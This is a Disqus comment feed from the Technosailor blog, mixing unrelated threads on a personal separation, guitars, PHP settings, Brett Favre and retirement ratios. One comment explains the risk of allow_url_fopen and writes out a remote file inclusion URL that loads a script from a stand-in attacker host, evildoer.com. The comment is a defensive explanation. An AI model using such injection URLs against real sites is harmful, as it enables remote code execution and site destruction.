DISQUS

Technosailor: Separation

  • Peter T Davis · 5 years ago
    Shit! My first thought is poor Devin!
  • Vinnie Garcia · 5 years ago
    Wow, that is sad to hear. Ultimately though, if you two aren't happy together it's not going to do either of you (or your son) any good. Do what's best for yourselves and especially the kid. It's easier for a kid to take something like this earlier than later in my opinion (my parents divorced when I was 17 after 8 years of back and forth), so keep it clean and think of your son first.
  • FireWolf · 5 years ago
    Ruh Roh, Guitars have entered the picture..... Nevermind those drummers, they have an ego only cuz they think they lead the beat....pffffttttt ;)



    Ibanez are good guitars, I have played jacksons, gibsons, and Fenders, i would love to get my hands on a Parker, but they don't make them for lefty's :(



    Carol, shame on you for letting that Ibanez sit there without picking it up, it needs a friend every day :)
  • Mark · 5 years ago
    Shhh....dont tell anyone Im british!! hehe! ;)
  • Vinnie Garcia · 5 years ago
    Eh youse gets used to it ;)
  • Vinnie Garcia · 5 years ago
    You can also set the register globals flag in Apache via .htaccess:

    php_flag register_globals off

    Though it's better to do this at the php.ini level and not in a PHP script or .htaccess. Sadly though, some hosts just won't turn RG off because some of their customers' systems rely on it.
  • Aaron Brazell · 5 years ago
    Ergh. I'll have to check on that. It's being used on Sean's site and I hadn't noticed those problems.
  • Aaron Brazell · 5 years ago
    Mike, of course I wasn't talking about Al Qaeda. Chill, man.
  • Aaron Brazell · 5 years ago
    Thanks, Dave... I fixed it.
  • Sean M. Crawford Sr · 5 years ago
    Dude I feel you. We all have that kind of moment in our lives. But for those of us that have purpose these moments can be much harder to deal with compared to the average person.



    You have seen me in my moments and have always told me:



    1. It's going to be alright.

    2. This too shall pass.

    3. Keep my head up.

    And last but not least...

    If I ever need a friend to talk about it call on you. Well those rules apply to you too.



    You are my brother & friend and I am here for you CUZIN.
  • Robert Mathews · 5 years ago
    Here's a simple example of why allow_url_fopen is a problem in the real world.



    I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:







    And then they run it with something like "http://www.example.com/index.php?page=page5.html".



    All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.



    Moral: allow_url_fopen should *always* be off unless you need it.



    Rob
  • Jeff Clark · 5 years ago
    That sucks to hear man, seriously. Sometimes you have to do what you have to do, but there is one thing I have a gigantic problem with (like it's even my place...)



    To all of those people who say "don't stay together just for the kids": you have obviously never been the child of a divorce. I had to go through my parent's divorce when I was 5. It sucked. Ass.



    I'm now (almost) 22, and I haven't talked to my father in 15 years. While it is teaching me what I need to do when I become a father, it sucks to not grow up with a father.



    Regardless of what some people say, strongly consider staying together JUST for the kids. Better yet, try counseling. Try seperation. Try ANYTHING, just as long as a divorce is the absolute final choice and you're sure you have absolutely no love left for your wife.



    End of rant :)
  • Aaron Brazell · 5 years ago
    It's an interesting topic, for sure. There's alot of speculation about Favre. I like Favre, personally. He's football's Cal Ripken and is nothing but a class act. It seems like everytime he plays on Monday Night Football (current year excepted), it's a spectacular showing from him.



    However, I liked Marino too. I think the endgame here is having Favre enshrined among the game's greatest... something that will already happen. He doesn't need to break Marino's record for that to happen and if he does break it, Marino's greatness will not be diminished either.



    So bottom line, if Favre stays in, great. I'd hate to see him stretch his career beyond what it should be just for another statistic, you know? What will it really prove if that happens? Nothing, really. Favre's greatness is already proven.
  • Stephan Segraves · 5 years ago
    We are ok for the next 50 yrs? My 13 yr. old brother can do the math to figure out that in less than 25 years every person in the work force will be supporting a retiree, compared to the 3/1 ratio we have now. Sounds like a problem to me.
  • Aaron Brazell · 4 years ago
    Weird is a state of mind, Jesse. :)